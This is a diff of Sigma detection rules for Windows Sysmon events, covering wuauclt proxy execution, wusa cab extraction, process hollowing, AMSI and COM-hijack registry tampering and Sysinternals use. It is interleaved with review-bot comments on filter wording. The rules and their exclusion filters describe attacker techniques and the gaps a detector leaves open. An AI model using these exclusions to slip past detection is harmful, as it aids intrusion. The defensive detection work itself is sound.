@@ -1,18 +1,16 @@ title: Proxy Execution Via Wuauclt.EXE id: af77cf95-c469-471c-b6a0-946c685c4798 related: - - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 - type: obsoletes - - id: d7825193-b70a-48a4-b992-8b5b3015cc11 - type: obsoletes + - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 + type: obsoletes + - id: d7825193-b70a-48a4-b992-8b5b3015cc11 + type: obsoletes status: test -description: Detects the use of the Windows Update Client binary (wuauclt.exe) for - proxy execution. +description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. references: - https://dtm.uk/wuauclt/ - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth - (Nextron Systems), Sreeman, FPT.EagleEye Team +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team date: 2020/10/12 modified: 2023/11/11 tags: 
@@ -28,22 +26,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - Image|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - UpdateDeploymentProvider - RunHandlerComServer filter_main_generic: - CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' filter_main_wuaueng: - CommandLine|contains: ' wuaueng.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' wuaueng.dll ' filter_main_uus: - CommandLine|contains: + CommandLine|contains: - :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId - :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId filter_main_winsxs: - CommandLine|contains|all: + CommandLine|contains|all: - :\Windows\WinSxS\ - '\UpdateDeploy.dll /ClassId ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml index 58606ee03..1ecedc533 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml 
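Review bot: The two new `# Note: Please enhance this if you find the full path` comments are addressed to the maintainer and do not tell an analyst what `filter_main_generic` and `filter_main_wuaueng` actually exclude, namely the bare-name invocations `' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '` and `' wuaueng.dll '` matched as substrings. I would replace them with something like `# Excludes the default bare-name invocation by the Windows Update client; a path-qualified DLL is still detected` and `# On-disk path of the legitimate DLL not yet confirmed - tighten when known`, so the reason the filter is deliberately loose is recorded alongside the request to tighten it.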
@@ -1,10 +1,8 @@ title: Suspicious Windows Update Agent Empty Cmdline id: 52d097e2-063e-4c9c-8fbb-855c8948d135 status: test -description: 'Detects suspicious Windows Update Agent activity in which a wuauclt.exe - process command line doesn''t contain any command line flags - - ' +description: | + Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Wuauclt.exe - - OriginalFileName: Wuauclt.exe + - Image|endswith: \Wuauclt.exe + - OriginalFileName: Wuauclt.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - Wuauclt - Wuauclt.exe condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml index c1e601e25..b680642a1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml 
@@ -1,9 +1,7 @@ title: Wusa Extracting Cab Files id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9 status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument which is not longer supported. - This could indicate an attacker using an old technique +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +18,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \wusa.exe - CommandLine|contains: '/extract:' + CommandLine|contains: '/extract:' condition: process_creation and selection falsepositives: - - The "extract" flag still works on older 'wusa.exe' versions, which could be - a legitimate use (monitor the path of the cab being extracted) + - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml index eb239705c..5a7eaf037 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml 
@@ -1,8 +1,7 @@ title: Wusa.EXE Extracting Cab Files From Suspicious Paths id: c74c0390-3e20-41fd-a69a-128f0275a5ea status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument from suspicious paths +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://www.echotrail.io/insights/search/wusa.exe/ @@ -21,13 +20,15 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_root: Image|endswith: \wusa.exe - CommandLine|contains: '/extract:' + CommandLine|contains: '/extract:' selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Users\Public\ - :\Windows\Temp\ - \Appdata\Local\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml index 9678eb18a..bf002e3f0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml 
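Review bot: The two commented-out entries `# - '\Desktop\'` and `# - '\Downloads\'` added to selection_paths carry no reason, so the next maintainer cannot tell whether they were dropped for false positives or are simply untested candidates. I would prefix them with a one-line explanation, e.g. `# Desktop/Downloads omitted by default - user-run installers commonly extract from here; enable if tolerable in your environment`, and keep them as a clear opt-in rather than dead YAML.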
@@ -1,10 +1,8 @@ title: Wusa.EXE Executed By Parent Process Located In Suspicious Location id: ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99 status: experimental -description: 'Detects execution of the "wusa.exe" (Windows Update Standalone Installer) - utility by a parent process that is located in a suspicious location. - - ' +description: | + Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. references: - https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document author: X__Junior (Nextron Systems) @@ -29,18 +27,18 @@ detection: - \Appdata\Local\Temp\ - \Temporary Internet selection_paths_2: - - ParentImage|contains|all: - - :\Users\ - - \Favorites\ - - ParentImage|contains|all: - - :\Users\ - - \Favourites\ - - ParentImage|contains|all: - - :\Users\ - - \Contacts\ - - ParentImage|contains|all: - - :\Users\ - - \Pictures\ + - ParentImage|contains|all: + - :\Users\ + - \Favorites\ + - ParentImage|contains|all: + - :\Users\ + - \Favourites\ + - ParentImage|contains|all: + - :\Users\ + - \Contacts\ + - ParentImage|contains|all: + - :\Users\ + - \Pictures\ condition: process_creation and (selection_img and 1 of selection_paths_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml b/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml index 6bb042c84..7d45b657f 100644 --- a/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml +++ b/sigma/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml 
@@ -1,8 +1,7 @@ title: Potential Process Hollowing Activity id: c4b890e5-8d8c-4496-8c66-c805753817cd status: experimental -description: Detects when a memory process image does not match the disk image, indicative - of process hollowing. +description: Detects when a memory process image does not match the disk image, indicative of process hollowing. references: - https://twitter.com/SecurePeacock/status/1486054048390332423?s=20 - https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ @@ -34,8 +33,7 @@ detection: Image|endswith: \opera.exe filter_optional_edge: Image|endswith: \WindowsApps\MicrosoftEdge.exe - condition: process_tampering and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_tampering and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml b/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml index ebdf26084..ec8f2d39c 100644 --- a/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml +++ b/sigma/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml 
@@ -1,9 +1,7 @@ title: Potential Defense Evasion Via Raw Disk Access By Uncommon Tools id: db809f10-56ce-4420-8c86-d6a7d793c79c status: test -description: Detects raw disk access using uncommon tools or tools that are located - in suspicious locations (heavy filtering is required), which could indicate possible - defense evasion attempts +description: Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -53,7 +51,7 @@ detection: - \Executables\SSDUpdate.exe - \HostMetadata\NVMEHostmetadata.exe filter_main_null: - Image: null + Image: filter_main_systemsettings: Image|endswith: :\Windows\ImmersiveControlPanel\SystemSettings.exe filter_optional_github_desktop: diff --git a/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml b/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml index 67e3b6f73..c38c94920 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_malware_netwire.yml @@ -23,7 +23,8 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey + # The configuration information is usually stored under HKCU:\Software\Netwire - RedCanary TargetObject|contains: \software\NetWire condition: registry_add and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml b/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml index c9205b8d8..55d2d892a 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_malware_ursnif.yml 
@@ -20,7 +20,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: \Software\AppDataLow\Software\Microsoft\ filter: TargetObject|contains: diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml index 73320d139..7cefd5c0c 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via New AMSI Providers - Registry id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 status: test -description: Detects when an attacker registers a new AMSI provider in order to achieve - persistence +description: Detects when an attacker registers a new AMSI provider in order to achieve persistence references: - https://persistence-info.github.io/Data/amsi.html - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c @@ -20,7 +19,7 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey TargetObject|contains: - \SOFTWARE\Microsoft\AMSI\Providers\ - \SOFTWARE\WOW6432Node\Microsoft\AMSI\Providers\ @@ -31,7 +30,6 @@ detection: - C:\Program Files (x86)\ condition: registry_add and (selection and not filter) falsepositives: - - Legitimate security products adding their own AMSI providers. Filter these according - to your environment + - Legitimate security products adding their own AMSI providers. Filter these according to your environment level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml index 9f7527ecf..6e2a4ebce 100644 
--- a/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml @@ -19,12 +19,14 @@ detection: EventID: 12 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: CreateKey + EventType: CreateKey # Don't want DeleteKey events TargetObject|contains|all: - HKU\ - Classes\CLSID\ - \TreatAs filter_svchost: + # Example of target object by svchost + # TargetObject: HKU\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs Image: C:\WINDOWS\system32\svchost.exe condition: registry_add and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml index 9e8fb46d8..4614f6e70 100644 --- a/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml +++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml 
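Review bot: The `filter_svchost` exclusion drops every TreatAs key created by `C:\WINDOWS\system32\svchost.exe`, which is a broad exemption for a persistence rule since any code running inside a service host would be filtered too; the example added in the comment shows the benign case is one specific CLSID. If that is the only known false positive, I would narrow the filter with a second field, e.g. `TargetObject|endswith: '\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs'`, and say so in the comment: `# Only the CLSID below has been observed from svchost.exe - do not widen without evidence`.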
@@ -1,16 +1,13 @@ title: Potential Persistence Via Disk Cleanup Handler - Registry id: d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a status: test -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence.\nThe disk cleanup manager is part of\ - \ the operating system. It displays the dialog box [\u2026]\nThe user has the\ - \ option of enabling or disabling individual handlers by selecting or clearing\ - \ their check box in the disk cleanup manager's UI.\nAlthough Windows comes with\ - \ a number of disk cleanup handlers, they aren't designed to handle files produced\ - \ by other applications.\nInstead, the disk cleanup manager is designed to be\ - \ flexible and extensible by enabling any developer to implement and register\ - \ their own disk cleanup handler.\nAny developer can extend the available disk\ - \ cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. + The disk cleanup manager is part of the operating system. It displays the dialog box […] + The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ 
@@ -28,9 +25,10 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: CreateKey
+ EventType: CreateKey
TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\
filter:
+ # Default Keys
TargetObject|endswith:
- \Active Setup Temp Folders
- \BranchCache
diff --git a/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml b/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml
index 9f8194bee..a1e1e6dc6 100644
--- a/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml
+++ b/sigma/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml
@@ -1,8 +1,7 @@
title: Potential Persistence Via Logon Scripts - Registry
id: 9ace0707-b560-49b8-b6ca-5148b42f39fb
status: test
-description: Detects creation of "UserInitMprLogonScript" registry value which can
- be used as a persistence method by malicious actors
+description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md
author: Tom Ueltschi (@c_APT_ure)
@@ -21,11 +20,10 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: CreateKey
+ EventType: CreateKey
TargetObject|contains: UserInitMprLogonScript
condition: registry_add and selection
falsepositives:
- - Investigate the contents of the "UserInitMprLogonScript" value to determine
- of the added script is legitimate
+ - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml
index 84ba5afce..fb71e448a 100644
--- a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml
+++ b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml
@@ -1,8 +1,7 @@
title: PUA - Sysinternal Tool Execution - Registry
id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
status: test
-description: Detects the execution of a Sysinternals Tool via the creation of the
- "accepteula" registry key
+description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
references:
- https://twitter.com/Moti_B/status/1008587936735035392
author: Markus Neis
@@ -20,7 +19,7 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: CreateKey
+ EventType: CreateKey
TargetObject|endswith: \EulaAccepted
condition: registry_add and selection
falsepositives:
diff --git a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml
index 62f8ced79..731db8fd1 100644
--- a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml
+++ b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml
@@ -1,14 +1,12 @@
title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
id: f50f3c09-557d-492d-81db-9064a8d4e211
related:
- - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
- type: derived
- - id: 8023f872-3f1d-4301-a384-801889917ab4
- type: similar
+ - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
+ type: derived
+ - id: 8023f872-3f1d-4301-a384-801889917ab4
+ type: similar
status: test
-description: Detects the creation of the "accepteula" key related to the Sysinternals
- tools being created from executables with the wrong name (e.g. a renamed Sysinternals
- tool)
+description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
@@ -26,8 +24,9 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: CreateKey
+ EventType: CreateKey
TargetObject|contains:
+ # Please add new values while respecting the alphabetical order
- \Active Directory Explorer
- \Handle
- \LiveKd
@@ -43,6 +42,7 @@ detection:
TargetObject|endswith: \EulaAccepted
filter:
Image|endswith:
+ # Please add new values while respecting the alphabetical order
- \ADExplorer.exe
- \ADExplorer64.exe
- \handle.exe
diff --git a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml
index a46a1fe17..8a52b01df 100644
--- a/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml
+++ b/sigma/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml
@@ -1,14 +1,12 @@
title: PUA - Sysinternals Tools Execution - Registry
id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d
related:
- - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
- type: derived
- - id: 9841b233-8df8-4ad7-9133-b0b4402a9014
- type: obsoletes
+ - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
+ type: derived
+ - id: 9841b233-8df8-4ad7-9133-b0b4402a9014
+ type: obsoletes
status: test
-description: Detects the execution of some potentially unwanted tools such as PsExec,
- Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula"
- registry key.
+description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
references:
- https://twitter.com/Moti_B/status/1008587936735035392
author: Nasreddine Bencherchali (Nextron Systems)
@@ -26,7 +24,7 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: CreateKey
+ EventType: CreateKey
TargetObject|contains:
- \Active Directory Explorer
- \Handle
@@ -37,11 +35,10 @@ detection:
- \PsLoglist
- \PsPasswd
- \SDelete
- - \Sysinternals
+ - \Sysinternals # Global level https://twitter.com/leonzandman/status/1561736801953382400
TargetObject|endswith: \EulaAccepted
condition: registry_add and selection
falsepositives:
- - Legitimate use of SysInternals tools. Filter the legitimate paths used in your
- environment
+ - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml b/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml
index 57c096a07..f74fd73fb 100644
--- a/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml
+++ b/sigma/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml
@@ -1,9 +1,7 @@
title: Folder Removed From Exploit Guard ProtectedFolders List - Registry
id: 272e55a4-9e6b-4211-acb6-78f51f0b1b40
status: test
-description: Detects the removal of folders from the "ProtectedFolders" list of of
- exploit guard. This could indicate an attacker trying to launch an encryption
- process or trying to manipulate data inside of the protected folder
+description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
references:
- https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -21,9 +19,8 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: DeleteValue
- TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender
- Exploit Guard\Controlled Folder Access\ProtectedFolders
+ EventType: DeleteValue
+ TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ProtectedFolders
condition: registry_delete and selection
falsepositives:
- Legitimate administrators removing applications (should always be investigated)
diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml b/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml
index fa0cb31da..0389359c5 100644
--- a/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml
+++ b/sigma/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml
@@ -1,8 +1,7 @@
title: Terminal Server Client Connection History Cleared - Registry
id: 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d
status: test
-description: Detects the deletion of registry keys containing the MSTSC connection
- history
+description: Detects the deletion of registry keys containing the MSTSC connection history
references:
- https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer
- http://woshub.com/how-to-clear-rdp-connections-history/
@@ -23,10 +22,10 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection1:
- EventType: DeleteValue
+ EventType: DeleteValue
TargetObject|contains: \Microsoft\Terminal Server Client\Default\MRU
selection2:
- EventType: DeleteKey
+ EventType: DeleteKey
TargetObject|contains: \Microsoft\Terminal Server Client\Servers\
condition: registry_delete and (1 of selection*)
falsepositives:
diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml b/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml
index f88a033c8..4500232a2 100644
--- a/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml
+++ b/sigma/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml
@@ -1,8 +1,7 @@
title: Removal Of AMSI Provider Registry Keys
id: 41d1058a-aea7-4952-9293-29eaaf516465
status: test
-description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI.
- This technique could be used by an attacker in order to disable AMSI inspection.
+description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://seclists.org/fulldisclosure/2020/Mar/45
@@ -21,10 +20,10 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: DeleteKey
+ EventType: DeleteKey
TargetObject|endswith:
- - '{2781761E-28E0-4109-99FE-B9D127C57AFE}'
- - '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}'
+ - '{2781761E-28E0-4109-99FE-B9D127C57AFE}' # IOfficeAntiVirus
+ - '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' # ProtectionManagement.dll
condition: registry_delete and selection
falsepositives:
- Unlikely
diff --git a/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
index dc90ce705..28aef90a1 100644
--- a/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
+++ b/sigma/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
@@ -1,13 +1,9 @@
title: Removal of Potential COM Hijacking Registry Keys
id: 96f697b0-b499-4e5d-9908-a67bec11cdb6
status: test
-description: 'Detects any deletion of entries in ".*\shell\open\command" registry
- keys.
-
- These registry keys might have been used for COM hijacking activities by a threat
- actor or an attacker and the deletion could indicate steps to remove its tracks.
-
- '
+description: |
+ Detects any deletion of entries in ".*\shell\open\command" registry keys.
+ These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/7
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md
@@ -29,7 +25,7 @@ detection:
EventID: 12
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- EventType: DeleteKey
+ EventType: DeleteKey
TargetObject|endswith: \shell\open\command
filter_svchost:
Image: C:\Windows\system32\svchost.exe
@@ -42,9 +38,11 @@ detection:
Image: C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
filter_dropbox:
Image|endswith: \Dropbox.exe
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: \Dropbox.
filter_wireshark:
Image|endswith: \AppData\Local\Temp\Wireshark_uninstaller.exe
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: \wireshark-capture-file\
filter_opera:
Image|startswith:
@@ -53,11 +51,14 @@ detection:
Image|endswith: \installer.exe
filter_peazip:
Image|contains: peazip
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: \PeaZip.
filter_everything:
Image|endswith: \Everything.exe
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
TargetObject|contains: \Everything.
filter_uninstallers:
+ # This image path is linked with different uninstallers when running as admin unfortunately
Image|startswith: C:\Windows\Installer\MSI
filter_java:
Image|startswith: C:\Program Files (x86)\Java\
@@ -65,7 +66,6 @@ detection:
TargetObject|contains: \Classes\WOW6432Node\CLSID\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}
condition: registry_delete and (selection and not 1 of filter_*)
falsepositives:
- - Legitimate software (un)installations are known to cause some false positives.
- Please add them as a filter when encountered
+ - Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered
